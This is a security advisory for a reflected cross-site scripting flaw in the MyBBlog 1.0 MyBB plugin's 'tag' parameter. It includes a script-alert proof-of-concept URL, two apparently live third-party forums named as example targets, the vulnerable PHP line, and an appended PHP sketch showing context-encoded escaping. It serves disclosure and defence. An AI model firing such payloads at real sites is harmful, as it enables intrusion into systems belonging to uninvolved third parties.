MyBB MyBBlog 1.0 Cross Site Scripting

2014-10-24T00:00:00
ID PACKETSTORM:128839
Type packetstorm
Reporter DevilScreaM
Modified 2014-10-24T00:00:00

Description

                                        
                                            `#Title : MyBB MyBBlog 1.0 Plugin Cross Site Scripting  
  
#Author : DevilScreaM  
  
#Date : 24 October 2014  
  
#Category : Web Applications  
  
#Vendor : https://github.com/JN-Jones/MyBBlog  
  
#Download : http://community.mybb.com/mods.php?action=view&pid=221  
  
#Version : 1.0  
  
#Greetz : newbie-security.or.id | Borneo Security | Indonesian Security  
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber | Madleets  
  
#Vulnerability : Cross Site Scripting  
  
  
Bug Location : mybblog.php parameter "tag"  
  
POC :  
  
http://127.0.0.1/mybblog.php?action=tag&tag=[XSS Injection]  
  
  
Example :  
  
http://liquidlemurlinux.org/forum/mybblog.php?action=tag&tag=<script>alert("DevilScreaM")</script>  
  
http://jobberguys.info/forum/mybblog.php?action=tag&tag=<script>alert("DevilScreaM")</script>  
  
===================================================================================  
  
Vulnerability at  
  
Location File :   
/inc/plugins/mybblog/modules/tag.php  
  
Code :  
  
add_breadcrumb($lang->sprintf($lang->mybblog_tags, $mybb->get_input("tag")), "mybblog.php?action=tag&tag={$mybb->get_input('tag')}");  
  
$articles = Article::getByTag($mybb->get_input("tag"));  
  
The "tag" input is used without any HTML filtering.  
  
`
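
Added example (not part of the original advisory and not MyBBlog's own code): the unescaped breadcrumb pattern shown above beside a context-encoded version. The render_breadcrumb() helper, the "Tag: " label and the assumption that the breadcrumb name and URL reach the page without further escaping are hypothetical stand-ins for the MyBB template layer.

```php
<?php
// Added example: stand-alone sketch, not MyBBlog or MyBB code.
// render_breadcrumb() is a hypothetical stand-in for a template that emits
// the stored breadcrumb name and URL without further escaping (assumption).
function render_breadcrumb(string $name, string $url): string
{
    return '<a href="' . $url . '">' . $name . '</a>';
}

// Pattern from the advisory: the raw "tag" value lands in both fields.
// "Tag: " is a placeholder for the plugin's language string.
function breadcrumb_unescaped(string $tag): string
{
    return render_breadcrumb("Tag: {$tag}", "mybblog.php?action=tag&tag={$tag}");
}

// Hardened: encode for each output context.
function breadcrumb_escaped(string $tag): string
{
    $flags = ENT_QUOTES | ENT_SUBSTITUTE;
    // Text node: HTML-encode, including both quote styles.
    $name = htmlspecialchars("Tag: {$tag}", $flags, 'UTF-8');
    // Query value: percent-encode, then HTML-encode the whole attribute
    // value so the literal "&" separator becomes "&amp;".
    $url = 'mybblog.php?action=tag&tag=' . rawurlencode($tag);
    return render_breadcrumb($name, htmlspecialchars($url, $flags, 'UTF-8'));
}

// Constructed sample input: the marker string from the advisory's example.
$tag = '<script>alert("DevilScreaM")</script>';
$before = breadcrumb_unescaped($tag);
$after = breadcrumb_escaped($tag);

// Fail loudly if the hardened output still contains a script element.
if (stripos($after, '<script') !== false) {
    throw new RuntimeException('escaped breadcrumb still contains markup');
}
echo "unescaped: {$before}", PHP_EOL;
echo "escaped:   {$after}", PHP_EOL;
```

Inside a MyBB plugin, the core helper htmlspecialchars_uni() fills the HTML-encoding role that htmlspecialchars() plays in this sketch.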